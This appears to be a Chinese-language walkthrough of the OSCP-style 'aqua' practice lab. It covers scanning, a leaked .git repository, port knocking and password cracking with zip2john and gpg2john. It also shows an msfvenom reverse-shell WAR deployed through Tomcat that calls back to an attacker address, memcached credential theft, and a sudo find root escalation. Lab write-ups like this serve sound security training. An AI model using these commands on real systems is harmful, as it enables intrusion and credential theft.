【OSCP-Medium】aqua

OSCP 靶场

靶场介绍

信息收集

主机发现

nmap -sn 192.168.1.0/24

端口扫描

└─$ nmap -sV -A -p- -Pn -T4 192.168.1.19
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-24 09:47 +06
Nmap scan report for Atlantis (192.168.1.19)
Host is up (0.00074s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 00:11:32:04:42:e0:7f:98:29:7c:1c:2a:b8:a7:b0:4a (RSA)
|   256 9c:92:93:eb:1c:8f:84:c8:73:af:ed:3b:65:09:e4:89 (ECDSA)
|_  256 a8:5b:df:d0:7e:31:18:6e:57:e7:dd:6b:d5:89:44:98 (ED25519)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Todo sobre el Agua
|_http-server-header: Apache/2.4.29 (Ubuntu)
8009/tcp open  ajp13   Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8080/tcp open  http    Apache Tomcat 8.5.5
|_http-open-proxy: Proxy might be redirecting requests
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/8.5.5
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.65 seconds

目录扫描

──(kali㉿kali)-[~]
└─$ gobuster dir -w pte_tools/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.1.19 -x html,php,txt -e
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.1.19
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                pte_tools/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              txt,html,php
[+] Expanded:                true
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://192.168.1.19/.html                (Status: 403) [Size: 277]
http://192.168.1.19/index.html           (Status: 200) [Size: 2883]
http://192.168.1.19/.php                 (Status: 403) [Size: 277]
http://192.168.1.19/img                  (Status: 301) [Size: 310] [--> http://192.168.1.19/img/]
http://192.168.1.19/css                  (Status: 301) [Size: 310] [--> http://192.168.1.19/css/]
http://192.168.1.19/robots.txt           (Status: 200) [Size: 33]
http://192.168.1.19/.html                (Status: 403) [Size: 277]
http://192.168.1.19/.php                 (Status: 403) [Size: 277]
http://192.168.1.19/server-status        (Status: 403) [Size: 277]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished
===============================================================
                                                                                                              
┌──(kali㉿kali)-[~]
└─$ gobuster dir -w pte_tools/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.1.19/SuperCMS -x html,php,txt -e 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.1.19/SuperCMS
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                pte_tools/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,php,txt
[+] Expanded:                true
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://192.168.1.19/SuperCMS/.php                 (Status: 403) [Size: 277]
http://192.168.1.19/SuperCMS/index.html           (Status: 200) [Size: 799]
http://192.168.1.19/SuperCMS/.html                (Status: 403) [Size: 277]
http://192.168.1.19/SuperCMS/img                  (Status: 301) [Size: 319] [--> http://192.168.1.19/SuperCMS/img/]
http://192.168.1.19/SuperCMS/login.html           (Status: 200) [Size: 2146]
http://192.168.1.19/SuperCMS/css                  (Status: 301) [Size: 319] [--> http://192.168.1.19/SuperCMS/css/]
http://192.168.1.19/SuperCMS/js                   (Status: 301) [Size: 318] [--> http://192.168.1.19/SuperCMS/js/]
http://192.168.1.19/SuperCMS/.php                 (Status: 403) [Size: 277]
http://192.168.1.19/SuperCMS/.html                (Status: 403) [Size: 277]

这里前端检验，登录后是一张图片还存在一段base64隐藏信息

解密后是如下信息，猜测是密码字典，但是1=2 是个啥？

┌──(kali㉿kali)-[~]
└─$ echo "MT0yID0gcGFzc3dvcmRfemlwCg==" | base64 -d
1=2 = password_zip

在首页html源码文件找到1和2,对应的是agua=H20，暂时还不知道用处，先放着，继续收集信息

这里对图片进行隐藏查看但是没有发现隐藏信息，重新对目录进行扫描发现存在.git 信息泄露

使用工具dump git 信息

https://github.com/arthaud/git-dumper

dump 后查看 git log,发现可疑文件 knocking_on_Atlantis_door.txt

进行查看详细日志，备注中有疑似端口敲门提示

git diff 3b7e4b8bb0eeb8557fc3ab0b9e7acec16431150a
git diff 58afe63a1cd28fa167b95bcff50d2f6f011337c1

那么我们使用knock敲打这个三个端口，然后进行扫描，发现多了一个ftp 端口可以访问

└─$ knock 192.168.1.19 1100 800 666 -v
hitting tcp 192.168.1.19:1100
hitting tcp 192.168.1.19:800
hitting tcp 192.168.1.19:666

匿名访问进入ftp 最终找到了备份文件

猜测里面存在tomcat 的登录账号密码，然后通过部署包获取权限。

这里还需要密码才能解压缩。

使用 zip2john 提取压缩包 hash 值对密码进行爆破

解压后成功获取tomcat 登录密码

权限获取

使用密码成功登录tomcat 管理后台，那么接下来就是常规操作了。 部署war 包。

┌──(kali㉿kali)-[~]
└─$ msfvenom -p linux/x64/shell_reverse_tcp lhost=192.168.1.76 lport=9088 -f war > boor.war 
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 74 bytes
Final size of war file: 1567 bytes

上传war 包后，访问成功获取shell

权限提升

使用linpeas.sh 扫描看到memcache服务，netstat 同样可以看到端口

11211 的前面是 0.0.0.0 的情况就是任意地址都可以登陆了

我们直接使用telnet 连接，item1里有5个key

telnet 127.0.0.1 11211

存在账号密码，直接get查看获取tridente 用户的密码，使用ssh 连接获取user.txt flag

这里提权到root 就比较简单了，https://gtfobins.github.io/gtfobins/find/

sudo find . -exec /bin/sh ; -quit

不过这个root flag ，就第一次碰到了。.gpg 后缀文件又是个啥加密文件，我们直接下载下来

又需要进行爆破，我们使用gpg2john 提权hash ，进行爆破

┌──(kali㉿kali)-[~/下载]
└─$ gpg2john root.txt.gpg > hash

File root.txt.gpg

sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash

解密成功，成功获取root flag

原文始发于微信公众号（贝雷帽SEC）：【OSCP-Medium】aqua